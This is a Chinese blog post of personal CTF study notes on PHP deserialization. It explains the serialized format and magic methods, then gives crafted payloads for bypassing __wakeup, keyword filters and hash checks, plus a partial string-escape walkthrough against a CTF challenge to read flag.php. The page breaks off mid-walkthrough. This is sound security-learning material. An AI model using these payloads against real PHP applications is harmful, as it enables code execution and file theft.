<!DOCTYPE html>
<html lang="en" color-mode="light">
  <head><meta name="referrer" content="no-referrer"/><meta name="generator" content="Hexo 6.3.0"></head>

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  
  <meta name="author" content="John Doe" />
  <meta name="description" content="" />
  
  
  <title>
    
      php反序列化小记(1) 
      
      
      |
    
     Prove yourself
  </title>

  
    <link rel="apple-touch-icon" href="/images/myblog.ico">
    <link rel="icon" href="/images/myblog.ico">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/me.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Aecous</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">php反序列化小记(1)</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2023-08-24 21:12:22
        </span>
        
      </div>
      <div class="markdown-body">
        <p>看了眼自己的笔记，太乱了，还有很多东西都没记，写一下</p>
<h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><p>php序列化本质上就是将数据转换成便于储存和传递的值，反序列化时逆回原来的数据，有利于传输，不丢失其类和结构<br>函数 serialize &amp;&amp; unserialize</p>
<p>序列化数据的格式</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">class test<span class="token punctuation">&#123;</span>
    public $test1 =<span class="token string">"test"</span>;

<span class="token punctuation">&#125;</span>
$a=new test();
echo serialize($a);


O<span class="token operator">:</span><span class="token number">4</span><span class="token operator">:</span><span class="token property">"test"</span><span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token punctuation">&#123;</span>s<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"test1"</span>;s<span class="token operator">:</span><span class="token number">4</span><span class="token operator">:</span><span class="token string">"test"</span>;<span class="token punctuation">&#125;</span>
对象类型<span class="token operator">:</span>名称长度<span class="token operator">:</span>对象名称<span class="token operator">:</span>对象个数<span class="token operator">:</span><span class="token punctuation">&#123;</span>属性类型<span class="token operator">:</span>属性长度<span class="token operator">:</span>属性名称;内容类型<span class="token operator">:</span>内容长度<span class="token operator">:</span>内容;<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>对象类型：</strong>Class-O，Array-a。 &#x2F;&#x2F;在后面还提到对象类型为C的，是arrayObject<br><strong>变量和参数类型：</strong>string-s，int-i，Array-a，引用-R。<br><strong>序列符号：</strong>参数与变量之间用分号(;)隔开，同一变量和同一参数之间的数据用冒号(:)隔开。</p>
<p>当属性变量为private和protected时，最好使用urlencode加密一下，会在属性名称前生成不可见字符</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">class test<span class="token punctuation">&#123;</span>
    private $test1 =<span class="token string">"test"</span>;
<span class="token punctuation">&#125;</span>

$a=new test();
echo serialize($a);

O%3A4%3A%22test%<span class="token number">22</span>%3A1%3A%7Bs%3A11%3A%<span class="token number">22</span>%00test%00test1%<span class="token number">22</span>%3Bs%3A4%3A%22test%<span class="token number">22</span>%3B%7D<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/35213294/1690868067700-18a1eee3-c123-4319-a33a-d59e989198a5.png#averageHue=%23383a34&clientId=u4bae68d0-c03b-4&from=paste&height=83&id=u809c1be8&originHeight=125&originWidth=519&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=49881&status=done&style=none&taskId=u2a2242ed-35ad-4ee3-b127-097f8705c29&title=&width=346" alt="image.png"><br>注：&gt;&#x3D;php v7.2 反序列化对访问类别不敏感</p>
<h3 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h3><pre class="line-numbers language-json" data-language="json"><code class="language-json">__wakeup() <span class="token comment">//执行unserialize()时，先会调用这个函数</span>

__sleep() <span class="token comment">//执行serialize()时，先会调用这个函数,session序列化写入时会触发</span>

__destruct()<span class="token comment">//对象销毁时触发</span>

__call() <span class="token comment">//在对象上下文中调用不可访问的方法时触发</span>
__callStatic() <span class="token comment">//在静态上下文中调用不可访问的方法时触发</span>
__get() <span class="token comment">//用于从不可访问的属性读取数据或者不存在这个键都会调用此方法</span>
<span class="token comment">//call和get的区别就是，call是访问不存在/不可访问的函数，get是不存在/不可访问的属性 </span>

__set() <span class="token comment">//用于将数据写入不可访问的属性</span>
__isset() <span class="token comment">//在不可访问的属性上调用isset()或empty()触发</span>
__unset() <span class="token comment">//在不可访问的属性上使用unset()时触发</span>

__toString() <span class="token comment">//把类当作字符串使用时触发  echo，正则匹配，字符串拼接等都会触发</span>

__invoke() <span class="token comment">//当尝试将对象调用为函数时触发</span>
一般调用形式为($this->b)()，但这种形式还可以用来进行任意函数调用
例如$this->b=<span class="token punctuation">[</span>new A<span class="token punctuation">,</span><span class="token string">"函数名"</span><span class="token punctuation">]</span><span class="token punctuation">,</span>还可以调用一些无参函数如phpinfo()


__construct() 当使用 new 关键字实例化一个对象时，构造函数将会自动调用。
__clone 调用clone方法时候调用<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>像这种情况也可以直接调用A的销毁</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">class A <span class="token punctuation">&#123;</span>
    public function __destruct()
    <span class="token punctuation">&#123;</span>
        echo <span class="token string">"A destruct \n"</span>;
        <span class="token comment">// TODO: Implement __destruct() method.</span>
    <span class="token punctuation">&#125;</span>

    public function __wakeup()<span class="token operator">:</span> void
    <span class="token punctuation">&#123;</span>
        echo <span class="token string">"A wakeup\n"</span>;
        <span class="token comment">// TODO: Implement __wakeup() method.</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

class B<span class="token punctuation">&#123;</span>
    public function __destruct()
    <span class="token punctuation">&#123;</span>
        echo <span class="token string">"B  destruct\n"</span>;
        <span class="token comment">// TODO: Implement __destruct() method.</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

$b = new B();
$b->a=new A();

unserialize(serialize($b));<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h3 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h3><h4 id="wakeupByass"><a href="#wakeupByass" class="headerlink" title="wakeupByass"></a>wakeupByass</h4><p>这大概是反序列化中最常见的考点之一，必须学会的</p>
<h5 id="PHP5-lt-5-6-25-或-PHP7-lt-7-0-10"><a href="#PHP5-lt-5-6-25-或-PHP7-lt-7-0-10" class="headerlink" title="PHP5&lt;5.6.25 或 PHP7&lt;7.0.10"></a>PHP5&lt;5.6.25 或 PHP7&lt;7.0.10</h5><p>当php的版本在这个区间时，可以通过修改类属性对象的数量来绕过wakeup</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">class test<span class="token punctuation">&#123;</span>
    public $test1 =<span class="token string">"test"</span>;
<span class="token punctuation">&#125;</span>
$a=new test();
echo serialize($a);


O<span class="token operator">:</span><span class="token number">4</span><span class="token operator">:</span><span class="token property">"test"</span><span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token punctuation">&#123;</span>s<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"test1"</span>;s<span class="token operator">:</span><span class="token number">4</span><span class="token operator">:</span><span class="token string">"test"</span>;<span class="token punctuation">&#125;</span>
          此处<span class="token number">1</span>改成<span class="token number">2</span>即可，或者在前面用+<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="php7-3"><a href="#php7-3" class="headerlink" title="php7.3"></a>php7.3</h5><p><a target="_blank" rel="noopener" href="https://bugs.php.net/bug.php?id=81151">https://bugs.php.net/bug.php?id=81151</a><br><a target="_blank" rel="noopener" href="https://www.yuque.com/boogipop/tdotcs/hobe2yqmb3kgy1l8?singleDoc#">https://www.yuque.com/boogipop/tdotcs/hobe2yqmb3kgy1l8?singleDoc#</a><br>pop✌写的<br>用内置类ArrayObject，序列化出来的类型是C，并且可以绕过wakeup，可惜版本锁死7.3</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">$arr=array(<span class="token string">"a"</span>=><span class="token number">1</span><span class="token punctuation">,</span><span class="token string">"b"</span>=><span class="token number">2</span>);
$ao=new ArrayObject($arr);
echo serialize($ao);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>可以使用的类型</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">ArrayObject<span class="token operator">:</span><span class="token operator">:</span>unserialize
ArrayIterator<span class="token operator">:</span><span class="token operator">:</span>unserialize
RecursiveArrayIterator<span class="token operator">:</span><span class="token operator">:</span>unserialize
SplObjectStorage<span class="token operator">:</span><span class="token operator">:</span>unserialize <span class="token comment">//这个使用的话看下文章，不过有前面的一般也不怎么用后面的</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>应该还能再开发一些，但是感觉没必要，以后有新的姿势可以学习一下</p>
<h5 id="fast-destruct-具体版本我不记得了"><a href="#fast-destruct-具体版本我不记得了" class="headerlink" title="fast destruct  具体版本我不记得了"></a>fast destruct  具体版本我不记得了</h5><p><a target="_blank" rel="noopener" href="https://hackerqwq.github.io/2021/08/29/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E6%8A%80%E5%B7%A7%E4%B9%8BFast-Destruct/">https://hackerqwq.github.io/2021/08/29/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E6%8A%80%E5%B7%A7%E4%B9%8BFast-Destruct/</a></p>
<p>正常情况</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">&lt;?php
class A <span class="token punctuation">&#123;</span>
    public function __destruct()
    <span class="token punctuation">&#123;</span>
        echo <span class="token string">"A destruct \n"</span>;
        <span class="token comment">// TODO: Implement __destruct() method.</span>
    <span class="token punctuation">&#125;</span>

    public function __wakeup()<span class="token operator">:</span> void
    <span class="token punctuation">&#123;</span>
        echo <span class="token string">"A wakeup\n"</span>;
        <span class="token comment">// TODO: Implement __wakeup() method.</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

class B<span class="token punctuation">&#123;</span>
    public function __destruct()
    <span class="token punctuation">&#123;</span>
        echo <span class="token string">"B  destruct\n"</span>;
        <span class="token comment">// TODO: Implement __destruct() method.</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">//$b = new B();</span>
<span class="token comment">//$b->a=new A();</span>
<span class="token comment">//echo serialize($b);</span>
<span class="token comment">//O:1:"B":1:&#123;s:1:"a";O:1:"A":0:&#123;&#125;&#125;</span>

$str='O<span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token property">"B"</span><span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token punctuation">&#123;</span>s<span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token string">"a"</span>;O<span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token property">"A"</span><span class="token operator">:</span><span class="token number">0</span><span class="token operator">:</span><span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span>';
unserialize($str);


---------------
A wakeup
B  destruct
A destruct <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>删掉最后一个}，即可先触发b的destruct</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">$str='O<span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token property">"B"</span><span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token punctuation">&#123;</span>s<span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token string">"a"</span>;O<span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token property">"A"</span><span class="token operator">:</span><span class="token number">0</span><span class="token operator">:</span><span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span>';
unserialize($str);

-------------
B  destruct
A wakeup
A destruct <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="php7-8"><a href="#php7-8" class="headerlink" title="php7-8"></a>php7-8</h5><p><a target="_blank" rel="noopener" href="https://github.com/php/php-src/issues/9618">https://github.com/php/php-src/issues/9618</a><br>需要一个private或者protect属性，大概就是反序列化时去掉private和protected参与序列化时生成的不可见字符即可使wakeup在call后面触发</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>

<span class="token keyword">class</span> <span class="token class-name-definition class-name">A</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$info</span><span class="token punctuation">;</span>
    <span class="token keyword">protected</span> <span class="token variable">$end</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"1"</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">info</span><span class="token operator">-></span><span class="token function">func</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">class</span> <span class="token class-name-definition class-name">B</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$end</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">end</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"exit();"</span><span class="token punctuation">;</span>
        <span class="token keyword">echo</span> <span class="token string single-quoted-string">'__wakeup'</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__call</span><span class="token punctuation">(</span><span class="token variable">$method</span><span class="token punctuation">,</span> <span class="token variable">$args</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'echo "aaaa";'</span> <span class="token operator">.</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">end</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'system("whoami");'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">// $b = new B();</span>
<span class="token comment">// $a = new A();</span>
<span class="token comment">// $a->info = $b;</span>
<span class="token comment">// var_dump(serialize($a));</span>

<span class="token comment">//         O:1:"A":2:&#123;s:4:"info";O:1:"B":1:&#123;s:3:"end";N;&#125;s:6:"\000A\000end";s:1:"1";&#125;</span>
<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'O:1:"A":2:&#123;s:4:"info";O:1:"B":1:&#123;s:3:"end";N;&#125;s:6:"Aend";s:1:"1";&#125;'</span><span class="token punctuation">;</span>
<span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>不过好像还存在其他用法啊，试了一下删个}也可以，<br>随便删个；还有改变属性键和长度，都会直接不触发wakeup和destruct,但是会调用call<br><img src="https://cdn.nlark.com/yuque/0/2023/png/35213294/1690887145523-ffc2522f-58ff-42fa-bfda-1fb088cb3105.png#averageHue=%23fefdfc&clientId=u4bae68d0-c03b-4&from=paste&height=197&id=ub81a8d26&originHeight=296&originWidth=538&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=28037&status=done&style=none&taskId=u25faf922-356b-4ef5-b025-44886f0e340&title=&width=358.6666666666667" alt="image.png"></p>
<h4 id="字符关键词等bypass"><a href="#字符关键词等bypass" class="headerlink" title="字符关键词等bypass"></a>字符关键词等bypass</h4><p>如果版本在wakeup bypass的第一种情况时，可以在对象长度前使用+-&lt;等操作</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">O<span class="token operator">:</span>+<span class="token number">4</span><span class="token operator">:</span><span class="token property">"test"</span><span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token punctuation">&#123;</span>s<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"test1"</span>;s<span class="token operator">:</span><span class="token number">4</span><span class="token operator">:</span><span class="token string">"test"</span>;<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在绕过一些数值的关键词时，可以大写代表属性或者值类的s，这样就可以识别16进制</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">class test<span class="token punctuation">&#123;</span>
    public $test1;
    public function __destruct()
    <span class="token punctuation">&#123;</span>
        echo $this->test1;
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
$s='O<span class="token operator">:</span><span class="token number">4</span><span class="token operator">:</span><span class="token property">"test"</span><span class="token operator">:</span><span class="token number">1</span><span class="token operator">:</span><span class="token punctuation">&#123;</span>S<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"\74est1"</span>;s<span class="token operator">:</span><span class="token number">4</span><span class="token operator">:</span><span class="token string">"test"</span>;<span class="token punctuation">&#125;</span>';
unserialize($s);


<span class="token comment">//test</span>
<span class="token comment">//t --->\74</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h4 id="绕过GC回收"><a href="#绕过GC回收" class="headerlink" title="绕过GC回收"></a>绕过GC回收</h4><pre class="line-numbers language-json" data-language="json"><code class="language-json">&lt;?php

class test<span class="token punctuation">&#123;</span>
    public $test1=<span class="token string">"aa"</span>;

    public function __destruct()
    <span class="token punctuation">&#123;</span>
        echo $this->test1.<span class="token string">"\n"</span>;
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>


$arr=array(<span class="token number">0</span>=>new test()<span class="token punctuation">,</span><span class="token number">1</span>=><span class="token null keyword">null</span>);
echo serialize($arr);
<span class="token comment">//a:2:&#123;i:0;O:4:"test":1:&#123;s:5:"test1";s:2:"aa";&#125;i:1;N;&#125;</span>
<span class="token comment">//																							将此处1改为0即可正常销毁</span>

<span class="token comment">//$s='a:2:&#123;i:0;O:4:"test":1:&#123;s:5:"test1";s:2:"aa";&#125;i:0;N;&#125;';</span>
<span class="token comment">//unserialize($s);</span>



throw new Error();<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>




<h4 id="绕过md5-sha1验证"><a href="#绕过md5-sha1验证" class="headerlink" title="绕过md5+sha1验证"></a>绕过md5+sha1验证</h4><p>就是遇见那种要求不相等，但是md5或sha1相等的情况，一般用一些报错类携带str，报错返回的数据都是一样的<br>可以用</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">Exception
ErrorException
Error
ParseError
mysqli_sql_exception<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>使用</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">$a=new Error($str<span class="token punctuation">,</span><span class="token number">1</span>);$b=new Error($str<span class="token punctuation">,</span><span class="token number">2</span>);  <span class="token comment">//得写一排，不然报错返回的行数不一样</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>


<p>&#x2F;&#x2F;如果遇见那种包含形式的，可以用fastcall（应该是叫这个？）去跑一个</p>
<h3 id="反序列化字符串逃逸"><a href="#反序列化字符串逃逸" class="headerlink" title="反序列化字符串逃逸"></a>反序列化字符串逃逸</h3><p>实际上也不难，就是要去算字符串吞与吐的个数<br>例题NSS - prize5</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">
&lt;?php
error_reporting(<span class="token number">0</span>);

class catalogue<span class="token punctuation">&#123;</span>
    public $class;
    public $data;
    public function __construct()
    <span class="token punctuation">&#123;</span>
        $this->class = <span class="token string">"error"</span>;
        $this->data = <span class="token string">"hacker"</span>;
    <span class="token punctuation">&#125;</span>
    public function __destruct()
    <span class="token punctuation">&#123;</span>
        echo new $this->class($this->data);
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
class error<span class="token punctuation">&#123;</span>
    public function __construct($OTL)
    <span class="token punctuation">&#123;</span>
        $this->OTL = $OTL;
        echo (<span class="token string">"hello "</span>.$this->OTL);
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
class escape<span class="token punctuation">&#123;</span>

    public $name = 'OTL';
    public $phone = '<span class="token number">123666</span>';
    public $email = 'sweet@OTL.com';
<span class="token punctuation">&#125;</span>
function abscond($string) <span class="token punctuation">&#123;</span>
    $filter = array('NSS'<span class="token punctuation">,</span> 'CTF'<span class="token punctuation">,</span> 'OTL_QAQ'<span class="token punctuation">,</span> 'hello');
    $filter = '/' . implode('|'<span class="token punctuation">,</span> $filter) . '/i';
    return preg_replace($filter<span class="token punctuation">,</span> 'hacker'<span class="token punctuation">,</span> $string);
<span class="token punctuation">&#125;</span>
if(isset($_GET<span class="token punctuation">[</span>'cata'<span class="token punctuation">]</span>))<span class="token punctuation">&#123;</span>
    if(!preg_match('/object/i'<span class="token punctuation">,</span>$_GET<span class="token punctuation">[</span>'cata'<span class="token punctuation">]</span>))<span class="token punctuation">&#123;</span>
        unserialize($_GET<span class="token punctuation">[</span>'cata'<span class="token punctuation">]</span>);

    <span class="token punctuation">&#125;</span>
    else<span class="token punctuation">&#123;</span>
        $cc = new catalogue();
        unserialize(serialize($cc));
    <span class="token punctuation">&#125;</span>
    if(isset($_POST<span class="token punctuation">[</span>'name'<span class="token punctuation">]</span>)&amp;&amp;isset($_POST<span class="token punctuation">[</span>'phone'<span class="token punctuation">]</span>)&amp;&amp;isset($_POST<span class="token punctuation">[</span>'email'<span class="token punctuation">]</span>))<span class="token punctuation">&#123;</span>
        if (preg_match(<span class="token string">"/flag/i"</span><span class="token punctuation">,</span>$_POST<span class="token punctuation">[</span>'email'<span class="token punctuation">]</span>))<span class="token punctuation">&#123;</span>                <span class="token comment">//对email字段有检验</span>
            die(<span class="token string">"nonono,you can not do that!"</span>);
        <span class="token punctuation">&#125;</span>
        $abscond = new escape();
        $abscond->name = $_POST<span class="token punctuation">[</span>'name'<span class="token punctuation">]</span>;
        $abscond->phone = $_POST<span class="token punctuation">[</span>'phone'<span class="token punctuation">]</span>;
        $abscond->email = $_POST<span class="token punctuation">[</span>'email'<span class="token punctuation">]</span>;
        $abscond = serialize($abscond);
        $escape = get_object_vars(unserialize(abscond($abscond)));
        if(is_array($escape<span class="token punctuation">[</span>'phone'<span class="token punctuation">]</span>))<span class="token punctuation">&#123;</span>
            echo base64_encode(file_get_contents($escape<span class="token punctuation">[</span>'email'<span class="token punctuation">]</span>));

        <span class="token punctuation">&#125;</span>
        else<span class="token punctuation">&#123;</span>
            echo <span class="token string">"I'm sorry to tell you that you are wrong"</span>;
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
else<span class="token punctuation">&#123;</span>
    highlight_file(__FILE__);
<span class="token punctuation">&#125;</span>
?>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这里还有个原生类的做法，但是我们这里是为了学习字符串逃逸，就不管了<br>序列化数据的三个属性都可控，进入序列化，经过abscond对字符串进行处理，最后读取类中的email属性的值，在序列化时email中不能存在flag字符串</p>
<h4 id="溢出做法"><a href="#溢出做法" class="headerlink" title="溢出做法"></a>溢出做法</h4><pre class="line-numbers language-json" data-language="json"><code class="language-json">class escape<span class="token punctuation">&#123;</span>

    public $name=<span class="token string">"a"</span>;
    public $phone=<span class="token string">"a"</span>;
    public $email=<span class="token string">"./flag.php"</span>;
<span class="token punctuation">&#125;</span>

$a=new escape();
echo serialize($a);

<span class="token comment">//O:6:"escape":3:&#123;s:4:"name";s:1:"a";s:5:"phone";s:1:"a";s:5:"email";s:10:"./flag.php";&#125;</span>
<span class="token comment">//这是我们最后需要反序列化的数据，当name参数可控时，我们可以通过往name中塞脏数据，通过abscond函数进行字符替换，导致字符溢出，让我们传入name的参数作为反序列化的字符串。</span>

<span class="token comment">//以name值结尾"开始溢出</span>
<span class="token comment">//$s='";s:5:"phone";s:1:"a";s:5:"email";s:10:"./flag.php";&#125;';</span>
<span class="token comment">//echo strlen($s);</span>
<span class="token comment">//需要溢出的字符串,长度为53</span>
<span class="token comment">//";s:5:"phone";s:1:"a";s:5:"email";s:10:"./flag.php";&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-json" data-language="json"><code class="language-json">function abscond($string) <span class="token punctuation">&#123;</span>
    $filter = array('NSS'<span class="token punctuation">,</span> 'CTF'<span class="token punctuation">,</span> 'OTL_QAQ'<span class="token punctuation">,</span> 'hello');
    $filter = '/' . implode('|'<span class="token punctuation">,</span> $filter) . '/i';
    return preg_replace($filter<span class="token punctuation">,</span> 'hacker'<span class="token punctuation">,</span> $string);
<span class="token punctuation">&#125;</span>
<span class="token comment">//abscond中，NSS长度为3，会被替换成长度为6的hacker，</span>
<span class="token comment">//我们可以用17个NSS，在加上两个hello，就可以成功溢出53个字符串</span>
<span class="token comment">//17 * 3 + 2 * 1 = 53</span>
<span class="token comment">//NSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSShellohello</span>
